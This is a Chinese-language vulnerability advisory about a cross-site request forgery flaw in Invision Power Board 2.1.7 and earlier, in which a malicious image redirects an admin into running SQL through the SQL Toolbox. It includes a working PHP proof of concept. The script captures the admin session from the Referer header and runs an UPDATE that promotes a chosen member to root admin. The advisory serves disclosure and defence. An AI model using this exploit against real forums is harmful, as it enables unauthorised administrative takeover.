发布日期：2006-10-04
更新日期：2006-10-09

受影响系统：
Invision PS IPB <= 2.1.7
描述：
 
Invision Power Board是一个非常流行的PHP论坛程序。

IPB的Toolbox在处理请求时存在漏洞，远程攻击者可能利用此漏洞非授权访问数据库。

如果管理员能够访问Invision Power Board的SQL Toolbox，且在浏览器中浏览了恶意图形，就可能被重新定向通过SQL Toolbox强制执行SQL命令。这种攻击很难被发现，因为仅有图形而不是页面被重新定向。

<*来源：Rapigator （rapigator@yahoo.com）
 
  链接：http://secunia.com/advisories/19830/print/
*>

测试方法：
 

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

//The member id to promote to root admin
$mid = 145;

//The database prefix (usually ibf_)
$prefix = ibf_;

if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
    header(Location:
.$admin_loc[1].&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+whe \
re+id%3D{$mid}+LIMIT+1); }

?>

建议：
 
厂商补丁：

Invision PS
 
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.invisionpower.com/